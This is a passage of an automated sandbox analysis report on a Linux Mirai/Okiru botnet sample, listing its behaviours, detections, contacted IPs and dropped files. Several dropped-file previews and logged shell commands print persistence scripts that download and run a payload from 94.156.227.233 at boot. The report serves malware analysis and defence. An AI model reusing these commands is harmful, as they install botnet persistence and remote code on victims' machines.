Source: /usr/bin/ln (PID: 6296)	File: /etc/rc.d/S99sh -> /etc/init.d/sh	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/x86_32.nn.elf (PID: 6238)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6287)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6292)	File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6450/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6472/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6471/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6474/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6396/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6473/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6476/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6475/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6470/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/799/cmdline	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6447/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6469/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6446/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6468/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6449/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6448/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6461/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6460/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6463/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6462/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6465/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6068/cmdline	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6464/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6368/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6445/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6467/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6444/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6466/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6416/status	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6300)	File opened: /proc/6418/status	Jump to behavior

Source: /tmp/x86_32.nn.elf (PID: 6253)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6286)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6288)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6290)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6291)	Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6293)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_32.nn.elf (PID: 6295)	Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 6287)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 6292)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/sh			Jump to behavior

Source: /bin/sh (PID: 6294)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /bin/sh (PID: 6260)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/x86_32.nn.elf (PID: 6238)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6287)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6292)	File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/x86_32.nn.elf (PID: 6238)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/x86_32.nn.elf (PID: 6238)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 6290)	Writes shell script file to disk with an unusual file extension: /etc/init.d/sh	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/x86_32.nn.elf (PID: 6238)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 6290)	File: /etc/init.d/sh			Jump to dropped file

Sample deletes itself

Source: /tmp/x86_32.nn.elf (PID: 6238)

File: /tmp/x86_32.nn.elf

Jump to behavior

Source: x86_32.nn.elf, 6238.1.00000000ffa50000.00000000ffa71000.rw-.sdmp, x86_32.nn.elf, 6297.1.00000000ffa50000.00000000ffa71000.rw-.sdmp, x86_32.nn.elf, 6308.1.00000000ffa50000.00000000ffa71000.rw-.sdmp, x86_32.nn.elf, 6311.1.00000000ffa50000.00000000ffa71000.rw-.sdmp

Binary or memory string: qemu-

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match	File source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY

Yara detected Okiru

Source: Yara match	File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match	File source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6238, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6297, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6311, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match	File source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY

Yara detected Okiru

Source: Yara match	File source: x86_32.nn.elf, type: SAMPLE
Source: Yara match	File source: 6308.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6297.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6311.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6238.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6238, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6297, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: x86_32.nn.elf PID: 6311, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
x86_32.nn.elf	40%	Virustotal		Browse
x86_32.nn.elf	45%	ReversingLabs	Linux.Backdoor.Mirai
x86_32.nn.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
/etc/init.d/sh	3%	ReversingLabs	Text.Browser.Generic
/etc/init.d/system	3%	ReversingLabs	Text.Browser.Generic
/etc/rc.local	0%	ReversingLabs

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://94.156.227.233/curl.sh	x86_32.nn.elf	false	high
http://94.156.227.233/lol.sh	x86_32.nn.elf	false	high
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	x86_32.nn.elf	false	high
http://94.156.227.233/	x86_32.nn.elf, sh.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
44.224.181.171	unknown	United States	16509	AMAZON-02US	false
174.194.249.14	unknown	United States	22394	CELLCOUS	false
124.189.196.216	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	false
57.215.48.129	unknown	Belgium	2686	ATGS-MMD-ASUS	false
220.235.63.126	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	false
17.45.30.32	unknown	United States	714	APPLE-ENGINEERINGUS	false
210.51.211.113	unknown	China	9929	CUIICHINAUNICOMIndustrialInternetBackboneCN	false
103.121.133.49	unknown	Indonesia	131478	CLARENCE-AS-APCLARENCEPROFESSIONALOFFICESPTYLIMITEDA	false
194.245.186.15	unknown	Germany	5517	CSLDE	false
208.46.97.148	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
197.254.172.29	unknown	Lesotho	37057	VODACOM-LESOTHOLS	false
83.122.188.192	unknown	Iran (ISLAMIC Republic Of)	197207	MCCI-ASIR	false
155.15.100.64	unknown	Canada	40155	APLLIUS	false
121.121.9.246	unknown	Malaysia	9534	MAXIS-AS1-APBinariangBerhadMY	false
23.155.83.6	unknown	Reserved	22652	FIBRENOIRE-INTERNETCA	false
134.188.53.245	unknown	Netherlands	42808	VIRTELA-NET-VNLAMS1NL	false
210.161.180.248	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
191.228.69.4	unknown	Brazil	26615	TIMSABR	false
110.174.129.4	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	false
214.21.154.124	unknown	United States	6026	DNIC-ASBLK-05800-06055US	false
207.140.221.139	unknown	United States	4473	ATTIS-ASN4473US	false
154.245.108.99	unknown	Algeria	36947	ALGTEL-ASDZ	false
58.204.40.109	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
146.230.119.134	unknown	South Africa	2018	TENET-1ZA	false
167.3.212.100	unknown	United States	6448	QADUS	false
121.17.55.106	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
80.254.57.177	unknown	Russian Federation	39046	THEOREMAStPetersburgRussianFederationRU	false
177.144.171.0	unknown	Brazil	27699	TELEFONICABRASILSABR	false
90.250.123.174	unknown	United Kingdom	5378	VodafoneGB	false
77.150.89.131	unknown	France	15557	LDCOMNETFR	false
29.221.57.132	unknown	United States	7922	COMCAST-7922US	false
65.255.177.227	unknown	Canada	32233	PERSONACA	false
9.148.99.252	unknown	United States	3356	LEVEL3US	false
173.100.238.188	unknown	United States	1239	SPRINTLINKUS	false
20.150.35.74	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
126.199.69.53	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
14.230.224.164	unknown	Viet Nam	45899	VNPT-AS-VNVNPTCorpVN	false
18.141.138.35	unknown	United States	16509	AMAZON-02US	false
159.4.36.240	unknown	United States	1906	NORTHROP-GRUMMANUS	false
47.175.106.200	unknown	United States	5650	FRONTIER-FRTRUS	false
22.216.227.222	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
217.191.134.17	unknown	Germany	6805	TDDE-ASN1DE	false
56.228.134.107	unknown	United States	2686	ATGS-MMD-ASUS	false
48.14.166.231	unknown	United States	2686	ATGS-MMD-ASUS	false
55.118.20.64	unknown	United States	361	DNIC-ASBLK-00306-00371US	false
18.65.61.52	unknown	United States	3	MIT-GATEWAYSUS	false
83.109.212.250	unknown	Norway	2119	TELENOR-NEXTELTelenorNorgeASNO	false
113.139.190.52	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
128.164.245.188	unknown	United States	11039	GWUUS	false
20.137.143.122	unknown	United States	21877	CSC-USAUS	false
158.147.31.168	unknown	United States	243	HARRIS-ATD-ASUS	false
37.20.160.128	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
13.222.71.194	unknown	United States	16509	AMAZON-02US	false
206.169.158.187	unknown	United States	3549	LVLT-3549US	false
135.141.226.183	unknown	United States	10455	LUCENT-CIOUS	false
48.252.209.208	unknown	United States	2686	ATGS-MMD-ASUS	false
108.246.54.50	unknown	United States	7018	ATT-INTERNET4US	false
18.165.52.22	unknown	United States	3	MIT-GATEWAYSUS	false
5.234.109.63	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
74.145.206.10	unknown	United States	7922	COMCAST-7922US	false
92.100.78.69	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
9.187.47.127	unknown	United States	3356	LEVEL3US	false
152.26.159.187	unknown	United States	81	NCRENUS	false
20.24.177.207	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
178.102.103.224	unknown	United Kingdom	12576	EELtdGB	false
96.47.236.159	unknown	United States	53974	JAZZ-NETWORKUS	false
132.173.130.115	unknown	United States	32982	DOE-HQUS	false
98.99.146.242	unknown	United States	62566	STARBUCKSUS	false
184.215.20.254	unknown	United States	10507	SPCSUS	false
202.203.59.67	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
19.209.69.30	unknown	United States	3	MIT-GATEWAYSUS	false
188.208.242.159	unknown	Iran (ISLAMIC Republic Of)	57218	RIGHTELIR	false
58.166.79.121	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	false
23.44.156.92	unknown	United States	16625	AKAMAI-ASUS	false
13.137.0.129	unknown	United States	7018	ATT-INTERNET4US	false
109.126.166.161	unknown	Belarus	44087	BEST-ASBY	false
8.215.225.213	unknown	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false
132.64.26.6	unknown	Israel	378	MACHBA-ASILANIL	false
94.217.211.82	unknown	Germany	3209	VODANETInternationalIP-BackboneofVodafoneDE	false
81.207.120.143	unknown	Netherlands	1136	KPNKPNNationalEU	false
171.93.113.244	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
182.210.48.93	unknown	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	false
177.145.51.90	unknown	Brazil	26599	TELEFONICABRASILSABR	false
214.57.89.89	unknown	United States	27064	DNIC-ASBLK-27032-27159US	false
190.176.34.26	unknown	Argentina	22927	TelefonicadeArgentinaAR	false
155.102.83.3	unknown	United States	17055	UTAHUS	false
42.104.77.111	unknown	India	55410	VIL-AS-APVodafoneIdeaLtdIN	false
45.9.249.72	unknown	Romania	9009	M247GB	false
221.22.160.53	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
44.89.67.209	unknown	United States	7377	UCSDUS	false
135.182.78.52	unknown	United States	46375	AS-SONICTELECOMUS	false
104.201.118.203	unknown	United States	30036	MEDIACOM-ENTERPRISE-BUSINESSUS	false
151.184.50.171	unknown	Netherlands	45025	EDN-ASUA	false
210.18.131.23	unknown	India	17488	HATHWAY-NET-APHathwayIPOverCableInternetIN	false
170.40.149.45	unknown	United States	264957	CoopercitrusCooperativadeProdutoresRuraisBR	false
155.96.178.156	unknown	United States	37532	ZAMRENZM	false
20.170.50.65	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
199.105.9.253	unknown	United States	7018	ATT-INTERNET4US	false
213.165.171.116	unknown	Malta	12709	MELITACABLEMT	false
58.19.3.91	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450	Get hash	malicious	Unknown	Browse	52.24.227.163
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	18.242.255.3
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	44.228.127.176
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	3.251.85.156
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	18.184.233.255
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	18.194.49.4
	b3astmode.sh4.elf	Get hash	malicious	Mirai	Browse	18.244.62.223
	b3astmode.mpsl.elf	Get hash	malicious	Mirai	Browse	108.148.158.220
	b3astmode.arm5.elf	Get hash	malicious	Mirai	Browse	18.145.1.10
	b3astmode.mips.elf	Get hash	malicious	Mirai	Browse	54.68.211.1
CELLCOUS	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	166.169.43.194
	b3astmode.mpsl.elf	Get hash	malicious	Mirai	Browse	70.217.217.2
	b3astmode.sh4.elf	Get hash	malicious	Mirai	Browse	97.21.61.30
	b3astmode.mips.elf	Get hash	malicious	Mirai	Browse	174.241.72.47
	b3astmode.arm.elf	Get hash	malicious	Mirai	Browse	174.197.240.230
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	75.253.25.42
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	97.9.134.109
	2.elf	Get hash	malicious	Unknown	Browse	70.223.58.93
	2.elf	Get hash	malicious	Unknown	Browse	97.53.95.239
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	75.224.119.223
ASN-TELSTRATelstraCorporationLtdAU	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	60.227.202.9
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	121.219.7.151
	b3astmode.mpsl.elf	Get hash	malicious	Mirai	Browse	120.157.226.110
	b3astmode.mips.elf	Get hash	malicious	Mirai	Browse	101.188.255.32
	jade.sh4.elf	Get hash	malicious	Mirai	Browse	124.191.33.29
	jade.m68k.elf	Get hash	malicious	Mirai	Browse	58.173.90.119
	jade.mpsl.elf	Get hash	malicious	Mirai	Browse	165.228.2.56
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	121.223.152.48
	loligang.x86.elf	Get hash	malicious	Mirai	Browse	101.103.10.52
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	101.188.125.251

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/system	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
/etc/init.d/sh	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.663595298101345
Encrypted:	false
SSDEEP:	3:KPJRK+KFtSyLdjX48FIbILbaaFOdFXa5O:WJ8+KHSYZX48bbaaeXCO
MD5:	3290F4F4E0B77B577C59026DEF246CEE
SHA1:	C51EAE7170430B5697B881BE716280D1FAAA9147
SHA-256:	534E1753E7B5026C5F689F31942BD84E7869232A5CE24AE02B0A9647B3E2EDCD
SHA-512:	DFE561F390A0003C92D0528D418CADA2A84DD4585F838F4A37BDD1790C8B7E947AFD31B527E4F98AD55F49F4168F4574540CCFF2D2EE38BD2A3923DEB9FE6345
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/sh

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	355
Entropy (8bit):	4.416220583499086
Encrypted:	false
SSDEEP:	6:h2Rk8d/Kd6Nx/SNAjDTZX48bJaJFCwWBvM1FnwfUMdNfabwHeJdxL/RuYHdSOovl:QRkobNxaNoPUJgjvM1F5KN+dRRucSOyl
MD5:	4C835AF4434E28E5B56D8CDFA8EE753D
SHA1:	B18DA30B2DF68AE4C788540CED328CA545C02F42
SHA-256:	CA0FAC03BB49D9F40E83353A3C85D27B8AD800B8A77F88D1B43025148672E28D
SHA-512:	877B96464C5D6AF38B84F8BE6ECDDA74A9703AA298A897B2EF8DEC9E9B929ECA2E8324979A80033B0E334820B15275E51C1E60EC5A26A7B379A2D8DA5BAC6162
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/sh..case "" in. start). echo 'Starting sh'. /bin/sh &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh'. killall sh. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	98
Entropy (8bit):	4.615605979741142
Encrypted:	false
SSDEEP:	3:TKH4v9+KFyFiLdjX48FIbILpaKB0dFLoKE0:h8KooZX48bzBeLXE0
MD5:	FE7F857A52EC42881A76D01D4A4A1C3C
SHA1:	6391FE715F06AB2D7E58D18A41ED3A358C7E820C
SHA-256:	20B80070DF0EDB6A011753C41051823E2F87C46A5493D6323BB5C023A19D2870
SHA-512:	4AA09F596ACE2DA18FE88DA2224681EAB2A4F77D005E2C67E97E9A0751C387F8DCCD8D1BB05644D75ED2F42959B6EE491D292F80CFEBB5D80EA5F0CE84C47816
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh./bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	103
Entropy (8bit):	4.612417623467759
Encrypted:	false
SSDEEP:	3:nAWu5YFtSyLdjX48FIbILbaaFOdFXa5O:A6HSYZX48bbaaeXCO
MD5:	175C6814BBE06EB5816EFE3FE3934230
SHA1:	8C1A49BF7CA134E8AD0DDA70872367062BC600C5
SHA-256:	11CB198833B5FB514AF33682A7148F95AA28CAEA16908A27FA10D71DD272730E
SHA-512:	C1A6BC79D50EEED397A98329E7A2CD7486CBB36F9D3B25AEADA15473D10C31FC2F44D2029F5A174FC813E3BB6B974174850989BF2ADD642F4CD4F1D279B6B1F1
Malicious:	false
Reputation:	low
Preview:	::respawn:/bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.486383977913608
Encrypted:	false
SSDEEP:	3:pKWNFyFiLdjX48FIbILbaaFOdFXa50:kKooZX48bbaaeXC0
MD5:	CEC61C0CDC61AB271C45B85281469388
SHA1:	E2DC08B86AC16A6A9BDA73D26DE0055528C647D9
SHA-256:	AE69256D9ACCEE8C05AFBF46267368A0DDB3E5C9C54D24CFB018A35FEF86C560
SHA-512:	71A65EB5CBBD53E395E8A2B392CB41E289874583C4A17E086498201C6078E5043B680B4971D1913863B2699626F05F63B0936BAFCE9A8F01C6DBAFEE5E93F2A7
Malicious:	true
Preview:	/bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/x86_32.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
